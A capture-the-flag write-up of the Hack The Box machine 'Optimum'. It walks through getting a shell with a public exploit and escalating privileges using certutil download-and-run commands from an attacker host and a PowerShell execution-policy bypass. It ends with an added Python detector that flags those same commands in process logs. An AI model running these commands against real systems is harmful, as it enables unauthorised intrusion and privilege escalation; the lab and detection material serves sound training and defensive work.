# Optimum HTB

## Enumeration

* We use `nmap -p- -A -Pn 10.10.10.8` to enumerate:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3cb0634f2933bf00027da89b450aa3e0c392ba25%2Fec15bca60a15214ce84e25bfdf5cb9c2.png?alt=media)
* We found a website:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-fb5b9bad06aaf8ba8fa633d21e1eee4c83b6ab5c%2Fb646d9528764eb0025f41cde0f628982.png?alt=media)

## Exploitation

* We used the exploit <https://www.exploit-db.com/exploits/39161>, for which we need nc.exe: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ba675e9a1af5b3bf8912e0ce740e9eb662d3baf6%2Fec4b94d7a5013d5fbbbda03f1afd6b1b.png?alt=media)
* We can find it at `/usr/share/windows-resources/binaries/nc.exe` and copy it into our `Downloads/optimum` folder.
* We modify the IP in the exploit file: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-aa13a894ffe85f062b4a8b24702dfc387eb5a7f3%2F5cd09758f6fdba139deca9a91f0ba02f.png?alt=media)
* We run `python3 -m http.server 80` to host our current directory, which contains the nc.exe file.
* We keep running the exploit with `python 39161.py 10.10.10.8 80` to get the shell:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0e8bdde8046fea258587ee00433fb9f4950eaadf%2F17bf9c07ceb34a265c0248fb49202463.png?alt=media)
* Then we upload Sherlock (<https://github.com/rasta-mouse/Sherlock>) using `certutil -urlcache -f http://10.10.14.25/sherlock.ps1 sherlock.ps1`
* Then we use it to look for vulnerabilities with `powershell.exe -exec bypass -Command "& {Import-Module .\sherlock.ps1; Find-AllVulns}"`: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7f38b86fb5f301c6abfb905c1c5b97f1c00e12a0%2Ffdac778fe513d4cdf0126d260eb1ac11.png?alt=media)
* We can also use wesng (<https://github.com/bitsadmin/wesng>)
* We use <https://github.com/sensepost/ms16-098/blob/master/bfill.exe> to get privilege escalation by uploading the file first `certutil -urlcache -f http://10.10.14.25/bfill.exe bfill.exe` and then executing it `bfill.exe`:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-408d130ff4673abfbcb190b4d48d5ddf8ccceda6%2Fe7f399854085fbe8802369fbcf4a0098.png?alt=media) We get a root shell.
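
From the defender's side, the download-and-run steps above leave a recognisable trail in process-creation logs. The following added example (not part of the original writeup) flags `certutil -urlcache -f` downloads and `powershell -exec bypass`, then correlates later commands that use a file certutil fetched; the log lines are constructed from the commands on this page, and the function and rule names are hypothetical.

```python
import re

# Constructed process-creation command lines, in order, shaped like the
# CommandLine field of Sysmon Event ID 1 / Windows event 4688.
SAMPLE_EVENTS = [
    r"ipconfig /all",
    r"certutil -urlcache -f http://10.10.14.25/sherlock.ps1 sherlock.ps1",
    r'powershell.exe -exec bypass -Command "& {Import-Module .\sherlock.ps1; Find-AllVulns}"',
    r"certutil -urlcache -f http://10.10.14.25/bfill.exe bfill.exe",
    r"bfill.exe",
    r"certutil -hashfile C:\Windows\notepad.exe SHA256",  # benign certutil use
]

# PowerShell accepts abbreviations of -ExecutionPolicy (-ex, -exec, -ep).
PS_BYPASS = re.compile(r"\bpowershell(\.exe)?\s.*?-(ep|ex\w*)\s+bypass\b", re.I)


def certutil_download(cmdline):
    """Return (url, saved_name) when certutil is used as a downloader, else None."""
    tokens = cmdline.split()
    if not tokens or not re.fullmatch(r"certutil(\.exe)?", tokens[0].rsplit("\\", 1)[-1], re.I):
        return None
    flags = {"-" + t[1:].lower() for t in tokens[1:] if t[0] in "-/"}
    args = [t for t in tokens[1:] if t[0] not in "-/"]
    url = next((a for a in args if re.match(r"https?://", a, re.I)), None)
    if url is None or not {"-urlcache", "-f"} <= flags:
        return None
    rest = [a for a in args if a != url]
    saved = rest[0] if rest else url.rsplit("/", 1)[-1]
    return url, saved.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (index, rule, detail) alerts for an ordered list of command lines."""
    fetched, alerts = set(), []
    for i, cmd in enumerate(events):
        download = certutil_download(cmd)
        if download:
            fetched.add(download[1])
            alerts.append((i, "certutil-download", download[0]))
            continue
        if PS_BYPASS.search(cmd):
            alerts.append((i, "powershell-policy-bypass", cmd))
        # Correlate: a later command that names a file certutil fetched earlier.
        for name in sorted(fetched):
            if re.search(r"(?<![\w.])" + re.escape(name) + r"(?![\w.])", cmd, re.I):
                alerts.append((i, "downloaded-file-used", name))
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The `certutil -hashfile` line is included to show that ordinary certutil use does not trigger the download rule.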
